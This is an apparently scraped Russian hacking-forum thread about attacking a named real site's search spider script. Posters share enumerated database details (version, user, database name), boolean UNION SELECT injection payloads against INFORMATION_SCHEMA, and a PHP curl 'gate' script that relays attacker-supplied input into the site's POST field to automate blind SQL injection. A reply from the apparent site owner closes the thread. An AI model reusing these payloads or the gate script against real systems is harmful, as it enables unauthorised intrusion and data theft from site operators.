VERSION() 5.1.38-log DATABASE() host1000119_search Таблы в БД host1000119_search Структура прям ппц USER() host1000119_sear@localhost Для юзера доступно 2 БД ппц, а как работат sakh-sun.ru Знач там другой юзверь
Там описан метод как найти таблы если пага не меняется, но есть вывод ошибок, и то там брутом А тут пага меняется, при TRUE говорит "присутствует в базе данных" если FALSE - не говорит http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=1# http://' UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES WHERE 1=2# Если запрос вернёт "1" скрипт говорит "присутствует в базе данных", просто Union select 1,2 не вернёт, поэтому надо из таблы, и добовляем условие Хакеры... Нате вам гейт для GET Запроса PHP: <?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://search.sakh-sun.ru/spider.php"); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'url=http%3A%2F%2F2q%27+UNION+SELECT+1%2C2+FROM+information_schema.tables+WHERE+1%3D1'.$_GET['c'].'&soption=level&maxlevel=2&in=&out='); curl_exec($ch); curl_close($ch); ?> Можно будет юзать script.php?c=%20AND 1=1%23 Ну я для себя делал потомучо мне быстрее гейт написать, чем настроить тузлу на POST
Да хз, я видео скачал и повторял всё как в видео, вон, вроде получилось Но блин, я захожу на mail.ru пишу в поиск и ничего неполучается, на icq.com таже телега, чё делать?
Kamik Флудер Регистрация: 02.12.2008 Сообщения: 4,294,967,294 Провел на форуме: 3 дня 6 часов 12 минут Репутация: 2 О_____О WTF?!
Ребята, конечно спасибо, но блин...е-мае... Сейчас в базе: 5415 сайтов, 6316 ссылок, 1 категорий и 148746 ключевых слов. И нафига все время скулить было. там же только база сайтов. Вся аутентификация хранится в других местах. Но все равно спасибо...будем делать работу над ошибками)))
